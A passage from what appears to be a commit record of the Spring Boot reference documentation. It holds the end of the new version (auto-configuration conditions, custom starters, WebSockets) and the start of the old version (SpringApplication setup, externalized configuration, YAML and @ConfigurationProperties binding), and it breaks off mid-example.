`@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only applies\nwhen relevant classes are found and when you have not declared your own `@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. For example, if\nyou provide web-specific configuration, your class may need to be applied after\n`WebMvcAutoConfiguration`.
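\nPutting this together, a minimal auto-configuration class might look like the following sketch. `AcmeService` stands in for a class provided by the library being auto-configured; the class would also need to be listed in `META-INF\/spring.factories` as shown above:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.condition.ConditionalOnClass;\n\timport org.springframework.boot.autoconfigure.condition.ConditionalOnMissingBean;\n\timport org.springframework.context.annotation.Bean;\n\timport org.springframework.context.annotation.Configuration;\n\n\t@Configuration\n\t@ConditionalOnClass(AcmeService.class)\n\tpublic class AcmeAutoConfiguration {\n\n\t\t@Bean\n\t\t@ConditionalOnMissingBean\n\t\tpublic AcmeService acmeService() {\n\t\t\t\/\/ only created if the user has not declared an AcmeService bean\n\t\t\treturn new AcmeService();\n\t\t}\n\n\t}\n----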
\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Conditional` annotations on your\nauto-configuration class. The `@ConditionalOnMissingBean` annotation is one common example\nthat is used to allow developers to '`override`' auto-configuration if they are not happy\nwith your defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allow\nconfiguration to be included based on the presence or absence of specific classes. Because\nannotation metadata is parsed using http:\/\/asm.ow2.org\/[ASM] you can\nactually use the `value` attribute to refer to the real class, even though that class\nmight not actually appear on the running application classpath. You can also use the\n`name` attribute if you prefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow a bean\nto be included based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nTIP: You need to be very careful about the order that bean definitions are added as these\nconditions are evaluated based on what has been processed so far. For this reason,\nwe recommend only using `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations\non auto-configuration classes (since these are guaranteed to load after any user-defined\nbean definitions have been added).\n\nNOTE: `@ConditionalOnBean` and `@ConditionalOnMissingBean` do not prevent `@Configuration`\nclasses from being created. Using these conditions at the class level is equivalent to\nmarking each contained `@Bean` method with the annotation.\n\n\n\n[[boot-features-property-conditions]]\n==== Property conditions\nThe `@ConditionalOnProperty` annotation allows configuration to be included based on a\nSpring Environment property. Use the `prefix` and `name` attributes to specify the\nproperty that should be checked. By default any property that exists and is not equal to\n`false` will be matched. You can also create more advanced checks using the `havingValue`\nand `matchIfMissing` attributes.
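\nFor example, the following sketch creates a bean unless `acme.notifier.enabled=false` is set (`AcmeNotifier` and the property names are hypothetical):\n\n[source,java,indent=0]\n----\n\t@Bean\n\t@ConditionalOnProperty(prefix = \"acme.notifier\", name = \"enabled\",\n\t\t\thavingValue = \"true\", matchIfMissing = true)\n\tpublic AcmeNotifier acmeNotifier() {\n\t\treturn new AcmeNotifier();\n\t}\n----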
\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web application conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be included depending on whether the application is a 'web\napplication'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be included based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n\n\n[[boot-features-custom-starter]]\n=== Creating your own starter\nA full Spring Boot starter for a library may contain the following components:\n\n* The `autoconfigure` module that contains the auto-configuration code.\n* The `starter` module that provides a dependency to the autoconfigure module as well as\n the library and any additional dependencies that are typically useful. In a nutshell,\n adding the starter should be enough to start using that library.\n\nTIP: You may combine the auto-configuration code and the dependency management in a single\nmodule if you don't need to separate those two concerns.\n\n\n\n[[boot-features-custom-starter-naming]]\n==== Naming\nPlease make sure to provide a proper namespace for your starter. Do not start your module\nnames with `spring-boot`, even if you are using a different Maven groupId. We may offer\nofficial support for the thing you're auto-configuring in the future.\n\nHere is a rule of thumb: if you are creating a starter for \"acme\", name the\nauto-configure module `acme-spring-boot-autoconfigure` and the starter\n`acme-spring-boot-starter`. If you only have one module combining the two, use\n`acme-spring-boot-starter`.\n\nBesides, if your starter provides configuration keys, use a proper namespace for them. In\nparticular, do not include your keys in the namespaces that Spring Boot uses (e.g.\n`server`, `management`, `spring`, etc). These are \"ours\" and we may improve\/modify them\nin the future in such a way that it could break your code.\n\nMake sure to\n<<appendix-configuration-metadata#configuration-metadata-annotation-processor,trigger\nmeta-data generation>> so that IDE assistance is available for your keys as well. You\nmay want to review the generated meta-data (`META-INF\/spring-configuration-metadata.json`)\nto make sure your keys are properly documented.\n\n\n\n[[boot-features-custom-starter-module-autoconfigure]]\n==== Autoconfigure module\nThe autoconfigure module contains everything that is necessary to get started with the\nlibrary. It may also contain configuration key definitions (`@ConfigurationProperties`)\nand any callback interface that can be used to further customize how the components are\ninitialized.\n\nTIP: You should mark the dependencies to the library as optional so that you can include\nthe autoconfigure module in your projects more easily. If you do it that way, the library\nwon't be provided and Spring Boot will back off by default.\n\n\n\n[[boot-features-custom-starter-module-starter]]\n==== Starter module\nThe starter is an empty jar, really. Its only purpose is to provide the necessary\ndependencies to work with the library; see it as an opinionated view of what is required\nto get started.\n\nDo not make assumptions about the project in which your starter is added. If the library\nyou are auto-configuring typically requires other starters, mention them as well.
Providing\na proper set of _default_ dependencies may be hard if the number of optional dependencies\nis high, as you should avoid bringing unnecessary dependencies for a typical usage of the\nlibrary.\n\n\n\n[[boot-features-websockets]]\n== WebSockets\nSpring Boot provides WebSockets auto-configuration for embedded Tomcat (8 and 7), Jetty 9\nand Undertow. If you're deploying a war file to a standalone container, Spring Boot\nassumes that the container will be responsible for the configuration of its WebSocket\nsupport.\n\nSpring Framework provides {spring-reference}\/#websocket[rich WebSocket support] that can\nbe easily accessed via the `spring-boot-starter-websocket` module.\n\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. If you have specific questions, take a look at the\n<<howto.adoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n","old_contents":"[[boot-features]]\n= Spring Boot features\n\n[partintro]\n--\nThis section dives into the details of Spring Boot. Here you can learn about the key\nfeatures that you will want to use and customize. If you haven't already, you might want\nto read the _<<getting-started.adoc#getting-started>>_ and\n_<<using-spring-boot.adoc#using-boot>>_ sections so that you have a good grounding\nof the basics.\n--\n\n\n\n[[boot-features-spring-application]]\n== SpringApplication\nThe `SpringApplication` class provides a convenient way to bootstrap a Spring application\nthat will be started from a `main()` method. In many situations you can just delegate to\nthe static `SpringApplication.run` method:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MySpringConfiguration.class, args);\n\t}\n----\n\nWhen your application starts you should see something similar to the following:\n\n[indent=0,subs=\"attributes\"]\n----\n .
____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: v{spring-boot-version}\n\n2013-07-31 00:08:16.117 INFO 56603 --- [ main] o.s.b.s.app.SampleApplication : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (\/apps\/myapp.jar started by pwebb)\n2013-07-31 00:08:16.166 INFO 56603 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy\n2014-03-04 13:09:54.912 INFO 41370 --- [ main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080\n2014-03-04 13:09:56.501 INFO 41370 --- [ main] o.s.b.s.app.SampleApplication : Started SampleApplication in 2.992 seconds (JVM running for 3.658)\n----\n\nBy default `INFO` logging messages will be shown, including some relevant startup details\nsuch as the user that launched the application.\n\n\n[[boot-features-banner]]\n=== Customizing the Banner\nThe banner that is printed on start up can be changed by adding a `banner.txt` file\nto your classpath, or by setting `banner.location` to the location of such a file.\nIf the file has an unusual encoding you can set `banner.charset` (default is `UTF-8`).\n\nYou can use the following variables inside your `banner.txt` file:\n\n.Banner variables\n|===\n| Variable | Description\n\n|`${application.version}`\n|The version number of your application as declared in `MANIFEST.MF`. For example `Implementation-Version: 1.0` is printed as `1.0`.\n\n|`${application.formatted-version}`\n|The version number of your application as declared in `MANIFEST.MF` formatted for\ndisplay (surrounded with brackets and prefixed with `v`). For example `(v1.0)`.\n\n|`${spring-boot.version}`\n|The Spring Boot version that you are using. For example `{spring-boot-version}`.\n\n|`${spring-boot.formatted-version}`\n|The Spring Boot version that you are using formatted for display (surrounded with\nbrackets and prefixed with `v`). For example `(v{spring-boot-version})`.\n\n|`${Ansi.NAME}` (or `${AnsiColor.NAME}`, `${AnsiBackground.NAME}`, `${AnsiStyle.NAME}`)\n|Where `NAME` is the name of an ANSI escape code. See\n{sc-spring-boot}\/ansi\/AnsiPropertySource.{sc-ext}[`AnsiPropertySource`] for details.\n|===\n\nTIP: The `SpringApplication.setBanner(...)` method can be used if you want to generate\na banner programmatically. Use the `org.springframework.boot.Banner` interface and\nimplement your own `printBanner()` method.\n\n\n\n[[boot-features-customizing-spring-application]]\n=== Customizing SpringApplication\nIf the `SpringApplication` defaults aren't to your taste you can instead create a local\ninstance and customize it. For example, to turn off the banner you would write:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setBannerMode(Banner.Mode.OFF);\n\t\tapp.run(args);\n\t}\n----\n\nNOTE: The constructor arguments passed to `SpringApplication` are configuration sources\nfor Spring beans.
In most cases these will be references to `@Configuration` classes, but\nthey could also be references to XML configuration or to packages that should be scanned.\n\nIt is also possible to configure the `SpringApplication` using an `application.properties`\nfile. See _<<boot-features-external-config>>_ for details.\n\nFor a complete list of the configuration options, see the\n{dc-spring-boot}\/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].\n\n\n\n[[boot-features-fluent-builder-api]]\n=== Fluent builder API\nIf you need to build an `ApplicationContext` hierarchy (multiple contexts with a\nparent\/child relationship), or if you just prefer using a '`fluent`' builder API, you\ncan use the `SpringApplicationBuilder`.\n\nThe `SpringApplicationBuilder` allows you to chain together multiple method calls, and\nincludes `parent` and `child` methods that allow you to create a hierarchy.\n\nFor example:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(Parent.class)\n\t\t.child(Application.class)\n\t\t.run(args);\n----\n\nNOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.\nWeb components *must* be contained within the child context, and the same `Environment`\nwill be used for both parent and child contexts. See the\n{dc-spring-boot}\/builder\/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder`\nJavadoc] for full details.\n\n\n\n[[boot-features-application-events-and-listeners]]\n=== Application events and listeners\nIn addition to the usual Spring Framework events, such as\n{spring-javadoc}\/context\/event\/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],\na `SpringApplication` sends some additional application events. Some events are actually\ntriggered before the `ApplicationContext` is created.\n\nYou can register event listeners in a number of ways, the most common being\n`SpringApplication.addListeners(...)` method.\n\nApplication events are sent in the following order, as your application runs:\n\n. An `ApplicationStartedEvent` is sent at the start of a run, but before any\n processing except the registration of listeners and initializers.\n. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in\n the context is known, but before the context is created.\n. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean\n definitions have been loaded.\n. An `ApplicationReadyEvent` is sent after the refresh and any related callbacks have\n been processed to indicate the application is ready to service requests.\n. An `ApplicationFailedEvent` is sent if there is an exception on startup.\n\nTIP: You often won't need to use application events, but it can be handy to know that they\nexist. Internally, Spring Boot uses events to handle a variety of tasks.\n\n\n\n[[boot-features-web-environment]]\n=== Web environment\nA `SpringApplication` will attempt to create the right type of `ApplicationContext` on\nyour behalf. By default, an `AnnotationConfigApplicationContext` or\n`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you\nare developing a web application or not.\n\nThe algorithm used to determine a '`web environment`' is fairly simplistic (based on the\npresence of a few classes). 
You can use `setWebEnvironment(boolean webEnvironment)` if\nyou need to override the default.\n\nIt is also possible to take complete control of the `ApplicationContext` type that will\nbe used by calling `setApplicationContextClass(...)`.\n\nTIP: It is often desirable to call `setWebEnvironment(false)` when using\n`SpringApplication` within a JUnit test.\n\n\n\n[[boot-features-application-arguments]]\n=== Accessing application arguments\nIf you need to access the application arguments that were passed to\n`SpringApplication.run(...)` you can inject a\n`org.springframework.boot.ApplicationArguments` bean. The `ApplicationArguments` interface\nprovides access to both the raw `String[]` arguments as well as parsed `option` and\n`non-option` arguments:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*;\n\timport org.springframework.beans.factory.annotation.*;\n\timport org.springframework.stereotype.*;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\t@Autowired\n\t\tpublic MyBean(ApplicationArguments args) {\n\t\t\tboolean debug = args.containsOption("debug");\n\t\t\tList<String> files = args.getNonOptionArgs();\n\t\t\t\/\/ if run with "--debug logfile.txt" debug=true, files=["logfile.txt"]\n\t\t}\n\n\t}\n----\n\nTIP: Spring Boot will also register a `CommandLinePropertySource` with the Spring\n`Environment`. This allows you to also inject single application arguments using the\n`@Value` annotation.\n\n\n\n[[boot-features-command-line-runner]]\n=== Using the ApplicationRunner or CommandLineRunner\nIf you need to run some specific code once the `SpringApplication` has started, you can\nimplement the `ApplicationRunner` or `CommandLineRunner` interfaces. Both interfaces work\nin the same way and offer a single `run` method which will be called just before\n`SpringApplication.run(...)` completes.\n\nThe `CommandLineRunner` interface provides access to application arguments as a simple\nstring array, whereas the `ApplicationRunner` uses the `ApplicationArguments` interface\ndiscussed above.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*;\n\timport org.springframework.stereotype.*;\n\n\t@Component\n\tpublic class MyBean implements CommandLineRunner {\n\n\t\tpublic void run(String... args) {\n\t\t\t\/\/ Do something...\n\t\t}\n\n\t}\n----\n\nYou can additionally implement the `org.springframework.core.Ordered` interface or use the\n`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner` or\n`ApplicationRunner` beans are defined that must be called in a specific order.\n\n\n\n[[boot-features-application-exit]]\n=== Application exit\nEach `SpringApplication` will register a shutdown hook with the JVM to ensure that the\n`ApplicationContext` is closed gracefully on exit. All the standard Spring lifecycle\ncallbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can\nbe used.\n\nIn addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`\ninterface if they wish to return a specific exit code when the application ends.\n\n\n\n[[boot-features-application-admin]]\n=== Admin features\nIt is possible to enable admin-related features for the application by specifying the\n`spring.application.admin.enabled` property. This exposes the\n{sc-spring-boot}\/admin\/SpringApplicationAdminMXBean.{sc-ext}[`SpringApplicationAdminMXBean`]\non the platform `MBeanServer`. You could use this feature to administer your Spring Boot\napplication remotely.
This could also be useful for any service wrapper implementation.\n\nTIP: If you want to know on which HTTP port the application is running, get the property\nwith key `local.server.port`.\n\nNOTE: Take care when enabling this feature as the MBean exposes a method to shut down the\napplication.\n\n\n\n[[boot-features-external-config]]\n== Externalized Configuration\nSpring Boot allows you to externalize your configuration so you can work with the same\napplication code in different environments. You can use properties files, YAML files,\nenvironment variables and command-line arguments to externalize configuration. Property\nvalues can be injected directly into your beans using the `@Value` annotation, accessed\nvia Spring's `Environment` abstraction or\n<<boot-features-external-config-typesafe-configuration-properties,bound to structured objects>>\nvia `@ConfigurationProperties`.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow\nsensible overriding of values. Properties are considered in the following order:\n\n. Command line arguments.\n. JNDI attributes from `java:comp\/env`.\n. Java System properties (`System.getProperties()`).\n. OS environment variables.\n. A `RandomValuePropertySource` that only has properties in `+random.*+`.\n. <<boot-features-external-config-profile-specific-properties,Profile-specific\n application properties>> outside of your packaged jar\n (`application-{profile}.properties` and YAML variants).\n. <<boot-features-external-config-profile-specific-properties,Profile-specific\n application properties>> packaged inside your jar (`application-{profile}.properties`\n and YAML variants).\n. Application properties outside of your packaged jar (`application.properties` and YAML\n variants).\n. Application properties packaged inside your jar (`application.properties` and YAML\n variants).\n. {spring-javadoc}\/context\/annotation\/PropertySource.{dc-ext}[`@PropertySource`] annotations\n on your `@Configuration` classes.\n. Default properties (specified using `SpringApplication.setDefaultProperties`).\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a\n`name` property:\n\n[source,java,indent=0]\n----\n\timport org.springframework.stereotype.*;\n\timport org.springframework.beans.factory.annotation.*;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\t@Value("${name}")\n\t\tprivate String name;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can bundle an `application.properties` inside your jar that provides a sensible\ndefault `name`. When running in production, an `application.properties` can be provided\noutside of your jar that overrides `name`; and for one-off testing, you can launch with\na specific command line switch (e.g. `java -jar app.jar --name="Spring"`).\n\n\n\n[[boot-features-external-config-random-values]]\n=== Configuring random values\nThe `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets\nor test cases). It can produce integers, longs or strings, e.g.\n\n[source,properties,indent=0]\n----\n\tmy.secret=${random.value}\n\tmy.number=${random.int}\n\tmy.bignumber=${random.long}\n\tmy.number.less.than.ten=${random.int(10)}\n\tmy.number.in.range=${random.int[1024,65536]}\n----\n\nThe `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any\ncharacter and `value,max` are integers.
If `max` is provided then `value` is the minimum\nvalue and `max` is the maximum (exclusive).\n\n\n\n[[boot-features-external-config-command-line-args]]\n=== Accessing command line properties\nBy default `SpringApplication` will convert any command line option arguments (starting\nwith '`--`', e.g. `--server.port=9000`) to a `property` and add it to the Spring\n`Environment`. As mentioned above, command line properties always take precedence over\nother property sources.\n\nIf you don't want command line properties to be added to the `Environment` you can disable\nthem using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[boot-features-external-config-application-property-files]]\n=== Application property files\n`SpringApplication` will load properties from `application.properties` files in the\nfollowing locations and add them to the Spring `Environment`:\n\n. A `\/config` subdir of the current directory.\n. The current directory\n. A classpath `\/config` package\n. The classpath root\n\nThe list is ordered by precedence (properties defined in locations higher in the list\noverride those defined in lower locations).\n\nNOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as\nan alternative to '.properties'.\n\nIf you don't like `application.properties` as the configuration file name you can switch\nto another by specifying a `spring.config.name` environment property. You can also refer\nto an explicit location using the `spring.config.location` environment property\n(comma-separated list of directory locations, or file paths).\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nor\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/default.properties,classpath:\/override.properties\n----\n\nIf `spring.config.location` contains directories (as opposed to files) they should end\nin `\/` (and will be appended with the names generated from `spring.config.name` before\nbeing loaded). The default search path `classpath:,classpath:\/config,file:,file:config\/`\nis always used, irrespective of the value of `spring.config.location`. In that way you\ncan set up default values for your application in `application.properties` (or whatever\nother basename you choose with `spring.config.name`) and override it at runtime with a\ndifferent file, keeping the defaults.\n\nNOTE: If you use environment variables rather than system properties, most operating\nsystems disallow period-separated key names, but you can use underscores instead (e.g.\n`SPRING_CONFIG_NAME` instead of `spring.config.name`).\n\nNOTE: If you are running in a container then JNDI properties (in `java:comp\/env`) or\nservlet context initialization parameters can be used instead of, or as well as,\nenvironment variables or system properties.\n\n\n\n[[boot-features-external-config-profile-specific-properties]]\n=== Profile-specific properties\nIn addition to `application.properties` files, profile-specific properties can also be\ndefined using the naming convention `application-{profile}.properties`. The\n`Environment` has a set of default profiles (by default `[default]`) which are\nused if no active profiles are set (i.e. 
if no profiles are explicitly activated\nthen properties from `application-default.properties` are loaded).\n\nProfile specific properties are loaded from the same locations as standard\n`application.properties`, with profile-specific files always overriding the non-specific\nones irrespective of whether the profile-specific files are inside or outside your\npackaged jar.\n\n\n\n[[boot-features-external-config-placeholders-in-properties]]\n=== Placeholders in properties\nThe values in `application.properties` are filtered through the existing `Environment`\nwhen they are used so you can refer back to previously defined values (e.g. from System\nproperties).\n\n[source,properties,indent=0]\n----\n\tapp.name=MyApp\n\tapp.description=${app.name} is a Spring Boot application\n----\n\nTIP: You can also use this technique to create '`short`' variants of existing Spring Boot\nproperties. See the _<<howto.adoc#howto-use-short-command-line-arguments>>_ how-to\nfor details.\n\n\n\n[[boot-features-external-config-yaml]]\n=== Using YAML instead of Properties\nhttp:\/\/yaml.org[YAML] is a superset of JSON, and as such is a very convenient format\nfor specifying hierarchical configuration data. The `SpringApplication` class will\nautomatically support YAML as an alternative to properties whenever you have the\nhttp:\/\/www.snakeyaml.org\/[SnakeYAML] library on your classpath.\n\nNOTE: If you use '`starter POMs`' SnakeYAML will be automatically provided via\n`spring-boot-starter`.\n\n\n\n[[boot-features-external-config-loading-yaml]]\n==== Loading YAML\nSpring Framework provides two convenient classes that can be used to load YAML documents.\nThe `YamlPropertiesFactoryBean` will load YAML as `Properties` and the\n`YamlMapFactoryBean` will load YAML as a `Map`.\n\nFor example, the following YAML document:\n\n[source,yaml,indent=0]\n----\n\tenvironments:\n\t\tdev:\n\t\t\turl: http:\/\/dev.bar.com\n\t\t\tname: Developer Setup\n\t\tprod:\n\t\t\turl: http:\/\/foo.bar.com\n\t\t\tname: My Cool App\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tenvironments.dev.url=http:\/\/dev.bar.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=http:\/\/foo.bar.com\n\tenvironments.prod.name=My Cool App\n----\n\nYAML lists are represented as property keys with `[index]` dereferencers,\nfor example this YAML:\n\n[source,yaml,indent=0]\n----\n\t my:\n\t\tservers:\n\t\t\t- dev.bar.com\n\t\t\t- foo.bar.com\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tmy.servers[0]=dev.bar.com\n\tmy.servers[1]=foo.bar.com\n----\n\nTo bind to properties like that using the Spring `DataBinder` utilities (which is what\n`@ConfigurationProperties` does) you need to have a property in the target bean of type\n`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it\nwith a mutable value, e.g. this will bind to the properties above\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix=\"my\")\n\tpublic class Config {\n\n\t\tprivate List<String> servers = new ArrayList<String>();\n\n\t\tpublic List<String> getServers() {\n\t\t\treturn this.servers;\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-external-config-exposing-yaml-to-spring]]\n==== Exposing YAML as properties in the Spring Environment\nThe `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`\nin the Spring `Environment`. 
This allows you to use the familiar `@Value` annotation with\nplaceholder syntax to access YAML properties.\n\n\n\n[[boot-features-external-config-multi-profile-yaml]]\n==== Multi-profile YAML documents\nYou can specify multiple profile-specific YAML documents in a single file by\nusing a `spring.profiles` key to indicate when the document applies. For example:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t\taddress: 192.168.1.100\n\t---\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\taddress: 127.0.0.1\n\t---\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\taddress: 192.168.1.120\n----\n\nIn the example above, the `server.address` property will be `127.0.0.1` if the\n`development` profile is active. If the `development` and `production` profiles are *not*\nenabled, then the value for the property will be `192.168.1.100`.\n\nThe default profiles are activated if none are explicitly active when the application\ncontext starts. So in this YAML we set a value for `security.user.password` that is\n*only* available in the "default" profile:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t port: 8000\n\t---\n\tspring:\n\t profiles: default\n\tsecurity:\n\t user:\n\t password: weak\n----\n\nwhereas in this example, the password is always set because it isn't attached to any\nprofile, and it would have to be explicitly reset in all other profiles as necessary:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t port: 8000\n\tsecurity:\n\t user:\n\t password: weak\n----\n\n\n\n[[boot-features-external-config-yaml-shortcomings]]\n==== YAML shortcomings\nYAML files can't be loaded via the `@PropertySource` annotation. So in the\ncase that you need to load values that way, you need to use a properties file.\n\n\n\n[[boot-features-external-config-typesafe-configuration-properties]]\n=== Typesafe Configuration Properties\nUsing the `@Value("${property}")` annotation to inject configuration properties can\nsometimes be cumbersome, especially if you are working with multiple properties or\nyour data is hierarchical in nature. Spring Boot provides an alternative method\nof working with properties that allows strongly typed beans to govern and validate\nthe configuration of your application. For example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix="connection")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String username;\n\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nNOTE: The getters and setters are advisable, since binding is via standard Java Beans\nproperty descriptors, just like in Spring MVC. They are mandatory for immutable types or\nthose that are directly coercible from `String`. As long as they are initialized, maps\nand collections need a getter but not necessarily a setter, since they can be mutated by\nthe binder; arrays, on the other hand, require a setter so that the binder can replace\nthem. If a setter is present, maps, collections, and arrays can also be created from\nscratch. Nested POJO properties can also be created (so a setter is not mandatory) if\nthey have a default constructor, or a constructor accepting a single value that can be\ncoerced from String. Some people use Project Lombok to add getters and setters\nautomatically.\n\nThe `@EnableConfigurationProperties` annotation is automatically applied to your project\nso that any beans annotated with `@ConfigurationProperties` will be configured from the\n`Environment` properties.
This style of configuration works particularly well with the\n`SpringApplication` external YAML configuration:\n\n[source,yaml,indent=0]\n----\n\t# application.yml\n\n\tconnection:\n\t\tusername: admin\n\t\tremoteAddress: 192.168.1.1\n\n\t# additional configuration as required\n----\n\nTo work with `@ConfigurationProperties` beans you can just inject them in the same way\nas any other bean.\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class MyService {\n\n\t\t@Autowired\n\t\tprivate ConnectionSettings connection;\n\n\t\t\/\/ ...\n\n\t\t@PostConstruct\n\t\tpublic void openConnection() {\n\t\t\tServer server = new Server();\n\t\t\tthis.connection.configure(server);\n\t\t}\n\n\t}\n----\n\nIt is also possible to shortcut the registration of `@ConfigurationProperties` bean\ndefinitions by simply listing the property classes directly in the\n`@EnableConfigurationProperties` annotation:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableConfigurationProperties(ConnectionSettings.class)\n\tpublic class MyConfiguration {\n\t}\n----\n\nTIP: Using `@ConfigurationProperties` also allows you to generate meta-data files that can\nbe used by IDEs. See the <<configuration-metadata>> appendix for details.\n\n\n\n[[boot-features-external-config-3rd-party-configuration]]\n==== Third-party configuration\nAs well as using `@ConfigurationProperties` to annotate a class, you can also use it\non `@Bean` methods. This can be particularly useful when you want to bind properties to\nthird-party components that are outside of your control.\n\nTo configure a bean from the `Environment` properties, add `@ConfigurationProperties` to\nits bean registration:\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix = "foo")\n\t@Bean\n\tpublic FooComponent fooComponent() {\n\t\t...\n\t}\n----\n\nAny property defined with the `foo` prefix will be mapped onto that `FooComponent` bean\nin a similar manner to the `ConnectionSettings` example above.\n\n\n\n[[boot-features-external-config-relaxed-binding]]\n==== Relaxed binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to\n`@ConfigurationProperties` beans, so there doesn't need to be an exact match between\nthe `Environment` property name and the bean property name. Common examples where this\nis useful include dash-separated (e.g. `context-path` binds to `contextPath`), and\ncapitalized (e.g. `PORT` binds to `port`) environment properties.\n\nFor example, given the following `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix="person")\n\tpublic class PersonSettings {\n\n\t\tprivate String 